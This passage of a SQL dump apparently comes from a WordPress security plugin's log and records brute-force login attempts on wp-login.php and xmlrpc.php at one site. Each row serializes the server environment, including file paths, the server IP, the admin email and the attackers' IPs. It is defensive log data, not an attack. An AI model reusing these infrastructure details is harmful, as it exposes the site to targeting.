20:03:30',17738928,19230088,'https://bintara.com.my/wp-login.php',1,0,'185.84.180.90'),(23923,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"128.199.155.15\";s:11:\"REMOTE_PORT\";s:5:\"53820\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6WNL1rBLb0GV3O7mS-VwAAAFg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568577076.1962\";s:12:\"REQUEST_TIME\";s:10:\"1568577076\";}}','notice','2019-09-15 19:51:17','2019-09-15 19:51:16',18254728,19554656,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.155.15'),(23922,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"128.199.155.15\";s:11:\"REMOTE_PORT\";s:5:\"53556\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6WMt7nxogXZmwWoWHLVwAAAJI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568577074.2289\";s:12:\"REQUEST_TIME\";s:10:\"1568577074\";}}','notice','2019-09-15 19:51:15','2019-09-15 19:51:14',17738400,19229640,'https://bintara.com.my/wp-login.php',1,0,'128.199.155.15'),(23921,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.143.24\";s:11:\"REMOTE_PORT\";s:5:\"35480\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6TpeesTgPVjZVPWmsn2gAAANA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568576421.6787\";s:12:\"REQUEST_TIME\";s:10:\"1568576421\";}}','notice','2019-09-15 19:40:22','2019-09-15 19:40:22',18255672,19555864,'https://bintara.com.my/xmlrpc.php',1,0,'46.101.143.24'),(23920,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.143.24\";s:11:\"REMOTE_PORT\";s:5:\"35036\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6Tot7nxogXZmwWoWHKUgAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568576418.7298\";s:12:\"REQUEST_TIME\";s:10:\"1568576418\";}}','notice','2019-09-15 19:40:19','2019-09-15 19:40:19',17738552,19228992,'https://bintara.com.my/wp-login.php',1,0,'46.101.143.24'),(23919,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.66.133.15\";s:11:\"REMOTE_PORT\";s:5:\"33606\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6Q1d7nxogXZmwWoWHJPQAAAJE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568575701.1809\";s:12:\"REQUEST_TIME\";s:10:\"1568575701\";}}','notice','2019-09-15 19:28:22','2019-09-15 19:28:21',18255672,19555864,'https://bintara.com.my/xmlrpc.php',1,0,'148.66.133.15'),(23918,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.66.133.15\";s:11:\"REMOTE_PORT\";s:5:\"33226\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6Q0r1rBLb0GV3O7mS@7AAAAFA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568575699.0626\";s:12:\"REQUEST_TIME\";s:10:\"1568575699\";}}','notice','2019-09-15 19:28:20','2019-09-15 19:28:19',17738104,19229272,'https://bintara.com.my/wp-login.php',1,0,'148.66.133.15'),(23917,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"91.227.6.17\";s:11:\"REMOTE_PORT\";s:5:\"45888\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6ON97nxogXZmwWoWHICgAAAII\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568575031.0883\";s:12:\"REQUEST_TIME\";s:10:\"1568575031\";}}','notice','2019-09-15 19:17:12','2019-09-15 19:17:11',18256280,19557024,'https://bintara.com.my/xmlrpc.php',1,0,'91.227.6.17'),(23916,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"91.227.6.17\";s:11:\"REMOTE_PORT\";s:5:\"45354\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6OM97nxogXZmwWoWHICAAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568575027.9467\";s:12:\"REQUEST_TIME\";s:10:\"1568575027\";}}','notice','2019-09-15 19:17:09','2019-09-15 19:17:08',17737736,19228128,'https://bintara.com.my/wp-login.php',1,0,'91.227.6.17'),(23915,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"23.83.230.2\";s:11:\"REMOTE_PORT\";s:5:\"38324\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX6LXmCCaIOMm5l5jJEjOQAAAQw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568574302.8698\";s:12:\"REQUEST_TIME\";s:10:\"1568574302\";}}','notice','2019-09-15 19:05:05','2019-09-15 